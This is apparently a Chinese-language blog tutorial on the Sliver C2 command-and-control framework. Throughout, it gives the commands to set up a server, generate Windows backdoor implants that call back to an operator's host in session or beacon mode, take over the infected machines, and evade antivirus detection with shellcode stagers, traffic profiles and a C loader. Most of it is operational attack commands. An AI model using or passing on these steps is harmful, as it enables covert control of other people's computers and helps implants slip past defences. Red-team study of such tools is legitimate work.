sliver C2远控工具

Sliver C2 是一个开源的跨平台红队框架,采用Go开发,目前特征相对于CS更少!
集成了MSF命令行运行模式,又结合了CS的优势特点,合并提供了两种操作模式
Beacon mode:实现了异步通信方式
Session mode:实现了实时会话方式

1、服务端

1.1 开启监听

在linux上操作,上传 sliver-server_linux 工具

1
2
3
4
chmod +x sliver-server_linux  #给予执行权限
./sliver-server_linux # 运行
new-operator --name yourname --lhost x.x.x.x # 生成凭据
multiplayer # 启用多人运动

客户端与服务端建立连接,靠的就是这个凭据文件,是独一无二的,防止被其他人连上

1.2 其他命令
命令 功能
http -l 8001 添加8001端口
jobs 查看通讯端口
jobs -k id值 删除端口
implants 查看生成的后门记录
profiles 查看模板

2、客户端

2.1 导入凭据

在cmd窗口中执行命令,将刚刚生成的凭据和exe文件放在同一目录中

1
2
sliver-client_windows.exe import 凭据.cfg  # 导入凭据
sliver-client_windows.exe # 再次连接

2.2 生成exe

Session mode 模式

无延迟 流量特征太大 容易被捕获

1
generate --http http://ip:8001 --os windows

Beacon mode 模式
1
generate beacon --http http://ip:8081 --os windows -S 5

--http: 设置模式 在服务端通过http -l 8001添加端口 后面跟上ip地址

--os: 可指定生成windows 后门 、linux、mac

--arch: amd64 可以指向架构 (可选)

-S: 延迟时间 beacon模式下使用

2.3 上线操作

当运行生成的后门文件时,在客户端会进行上线。

Session mode 模式

当有后门以session模式上线时

1
2
sessions  # 查看上线的机器
use 编号 # 进入

Beacon mode 模式
1
2
beacon  # 查看上线的机器
use 编号 # 进入

3、免杀测试

当在wireshark分析流量时,发现很明显的特征,这很容易被识别为后门文件

免杀方向

1、同CS一样针对ShellCode处理
generate stager --lhost x.x.x.x --lport xx --format raw
file_fl_xor.cpp
2、源码级别的二开魔改打乱特征
-默认生成的模版
-Profile流量模版
-改动工具执行调用链

3.1 创建profiles

1
2
http -l 9003
profiles new beacon --http ip:9003 --skip-symbols --format shellcode --arch amd64 beacon_test -S 3

可以加延迟时间 (-S 3)

目前profiles:9003 后门端口:39005

不使用通讯:39005 所有数据走这个端口

如果使用通讯: 那么上线9003 后续39005

3.2 创建分阶段监听器

1
stage-listener --url tcp://ip:未占用端口 --profile beacon_test

3.3 创建Stager

生成shellcode

1
generate stager --lhost ip地址 --lport 9090 --arch amd64 --format c

--format:生成的shellcode格式

可能遇到报错

1
[!] Error: rpc error: code = Unknown desc = msfvenom not found in PATH - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH

windows去官网下载运行程序安装

http://www.metasploit.com/download

在linux上我们需要安装一下Metasploit

1
2
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall 
chmod 755 msfinstall && ./msfinstall

通过c语言加载器来生成后门即可!